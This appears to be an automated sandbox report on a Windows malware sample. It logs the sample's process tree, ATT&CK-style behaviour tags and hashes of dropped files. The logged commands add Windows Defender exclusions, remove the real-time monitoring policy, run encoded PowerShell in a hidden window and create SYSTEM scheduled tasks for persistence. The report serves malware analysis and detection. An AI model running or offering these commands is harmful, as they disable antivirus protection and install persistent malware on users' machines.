C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"2⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"2⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCqZdsRvg" /SC once /ST 03:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCqZdsRvg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCqZdsRvg"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nXyehDwmHPyyRtSpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nXyehDwmHPyyRtSpH2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "aPDUmbyOvRHXxkUgy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "aPDUmbyOvRHXxkUgy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MVHoCtCeIZaPacKATKY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MVHoCtCeIZaPacKATKY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QyHDZeZycVybuDMKzsX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QyHDZeZycVybuDMKzsX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kuRaZQzPzSEXqOG" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LHaWkDmLjErwAUu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LHaWkDmLjErwAUu"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LHaWkDmLjErwAUu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LHaWkDmLjErwAUu2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FDoxwemLCToLkG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FDoxwemLCToLkG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZqYrCjlOPEYEs"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZqYrCjlOPEYEs"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZqYrCjlOPEYEs2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZqYrCjlOPEYEs2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kuRaZQzPzSEXqOG2" /F /xml "C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kuRaZQzPzSEXqOG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kuRaZQzPzSEXqOG"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JtqMXtEvkLBXZN" /F /xml "C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lYzkwzoDPQRBQ2" /F /xml "C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aPDUmbyOvRHXxkUgy2" /F /xml "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QyHDZeZycVybuDMKzsX2" /F /xml "C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 2682⤵
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {6C351B03-A3D7-47AE-A392-9852CA7550D7} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xmlFilesize
2KB
MD5c4ba44b6ef23e4d8d107d2260eea2841
SHA1414fd6d2125b0f61e567851c364e938928fc77c7
SHA2561a92133dc9bc9b20a9215de4de5f7852b254fa8500ff5a3476edc7e4f1791747
SHA5124313f1c143c3f82b422f176122fe3d990df81112f27da493923cd6043106b694b0bc07a29192fc139dbf99bd13778627bd9ae9bcf3f64ce2e2d730f7361ffa17
-
C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xmlFilesize
2KB
MD557c824c11c3e6ed179c67939b45c85b3
SHA1624866f8b091a6e589a4440e45038a3893ce2c02
SHA25641b10bcd1e4493f2cd1e9aa1748c652b61b6234f645d7daf291449e3a340f435
SHA512bcb9b6cb31ca2525130406fabc32fcfd8ee1a2551362329db9aa0082b42c783d5579d697fd07909293bf95849cbab6c4bf5ef243f1b7e5ad0a4c50377cb75777
-
C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xmlFilesize
2KB
MD58c1dee459fe5e32abf00e036e63d0fae
SHA121784a082e6edd54c0a386f2a4ed62c929c0965f
SHA256a45bc97d1465f1b16d86d9867c716f1b55561c3605edd8048a7a686c5f4b6f98
SHA512bedf6ffa0e4abb787e3a0370aa40abbfdc53903bb61f772b2e3a46b9b3da146fb7446c0048ef2504292e545736cedf71c2728550428fbe63f6bcc7ed90e91d36
-
C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xmlFilesize
2KB
MD5d67f0d5ccb365632ac259b64994c2405
SHA14aeca6afe89dc6bd683b38a78fdce3a3f594bd66
SHA25637c82ba01190f57c9c19d95496704eddf8082dedd52cd58c69c5fc810df9a668
SHA512d2bf374e7d0169e7577958c702195358cc0c9f77924fce8a135491320d8ad3040798c97e053b508412a351dec3c4b92bfbe4745a029fb3ae2df2e595dc1f1976
-
C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpiFilesize
640KB
MD5c18ffa61f37cd70c6e84068b104217e0
SHA16709a23ee9865872924fba28f2f177c59011eed8
SHA256fd430e616b8572849fb1c39b0c1f5c5cb7c243243ddf4c4a1a4a2c7a4fd84a7e
SHA512742fea837bf81178bbbca5869dd36d2bfe97e810ef03c732c35423cdd5aaa54f455afa0b7adb6f6e9889dd09879eba83e2e13271e658f263d1f2f9e7acf9fc2e
-
C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xmlFilesize
2KB
MD50f8ab85c7c1a4428b45a80658598d1cc
SHA1ed43248b1e531b06506f1b2a07effc8558396aa3
SHA2561b4944b69092252da3df29bf60581d53028a91a78240b2e909b34ca6a51d517e
SHA512efafa6a87242d1af661bfef7d615807b893497f2d2ad1717681151665dbc1e670dc69cbb19d8b72fdc22f95667eac88b0c70a5e1f0d2fe7d373bed5e3c567928
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\en\messages.jsonFilesize
150B
MD533292c7c04ba45e9630bb3d6c5cabf74
SHA13482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA2569bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA5122439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\_locales\pt_BR\messages.jsonFilesize
161B
MD55c5a1426ff0c1128c1c6b8bc20ca29ac
SHA10e3540b647b488225c9967ff97afc66319102ccd
SHA2565e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA5121f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43JRD5R919C9MEYAZPTV.tempFilesize
7KB
MD5336ff9346b3dd7a8524f8bd56b255b59
SHA1ed0871a93f65f2be83401c932d6dced842cf3ceb
SHA2568d3c01de117121b8a44344ded346aa555754d16e592fa5b52003781fc48f1b82
SHA5121a4b7e34947e7facc62706290e39aa83cafff623f26dac53e871cbcd7b29f273d6d0b9a27e2164b606dea12fdd998560d34ed2cb6385049d373eb8cac7eff988
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5870d02d3fdbba6c03629371c363f596e
SHA1cc1bc29cb21174c6f22a6947d547f3a6b033f475
SHA256d830e94c2d98621fad66cfcbc901a8b728cbd4ee04ec65cb5fd85b5248c62b05
SHA512bfd0880d9bec7444f13bf7d4be195977832f8cb1167d01be01f46ece35786f81c9e66d11cda8cafb6af63fd9c60e0044fcac0d560dc3fd78d6306d5c2c0e269b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GE6QBBB5QH8XLU19LB92.tempFilesize
7KB
MD50e09dbffd9205e87ab4e02977205578a
SHA1070284ad1f4e21ccf8dd818c2c484902fe2000bc
SHA256cd588fdd422bb5c62e32be0223c01e209394114196f0e4fe1097c5020bcf55e5
SHA5125f2ff37a03bdf214df43980d56b023412541056c47f55321506d9b0440198ac9b3ea75493e7e6024232b28d98548d5204f0303f389505085d157c40eefe3009f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5967506555ff0733a9fd4a44bffda77bf
SHA174a9c2a8ce64cb34f336fa0d787aa337356aa999
SHA256f36bbc3e818c2390dc1a29a03eaf6289d02ce081f5818ab36beb45521e3e0306
SHA5124a62a1877c100bdcbc061656aeaee37fda48a54de74e3cfd440984d67db7c740229ea257d7783b54d1c5a79369cfa9698176b2cef234feff24c3b65c0ebf2259
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.jsFilesize
6KB
MD5fcd2fbb0957b3e8a63d48d508a9cccfd
SHA1486bf982500df507e264f3f89f043e53d55621f4
SHA25656e35eda4a1338a9e18931fb34ddf0753935cb6c193c86286d09fe3465567e96
SHA5128baa29334b64bdd66b298d9e4a53c84db05e70d1cacdf984c9a1c3412ea4b969f7c2a3e47fb1dfc61753cdff85d59ec109d77485f7bb30d8c55222d9d0d6a0e0
-
C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsfFilesize
9KB
MD568a8bdc9d9f09ff06ba1eac18457c0c7
SHA1659af8fef29016caa8cb74a317d6eb66e7e44269
SHA256886c60b61f2b8847420eef4d7090e9a07acd5a2c0bed51427f6db5b04cfbe616
SHA512b92c8e46a85cc4dfe01269350f84168af46b14af671faad8e79bc98c1ea2b4914d89475741df1904dba30b63ecd8b219577e30485a104565e6a385e9f0e40852
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1196-39-0x000000001B7A0000-0x000000001BA82000-memory.dmpFilesize
2.9MB
-
memory/1628-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmpFilesize
32KB
-
memory/1628-11-0x000000001B580000-0x000000001B862000-memory.dmpFilesize
2.9MB
-
memory/1684-22-0x000000001B830000-0x000000001BB12000-memory.dmpFilesize
2.9MB
-
memory/1684-23-0x0000000001DE0000-0x0000000001DE8000-memory.dmpFilesize
32KB
-
memory/2780-2-0x0000000010000000-0x00000000105D3000-memory.dmpFilesize
5.8MB
-
memory/2780-88-0x0000000004060000-0x00000000040C5000-memory.dmpFilesize
404KB
-
memory/2780-51-0x0000000003A70000-0x0000000003AF5000-memory.dmpFilesize
532KB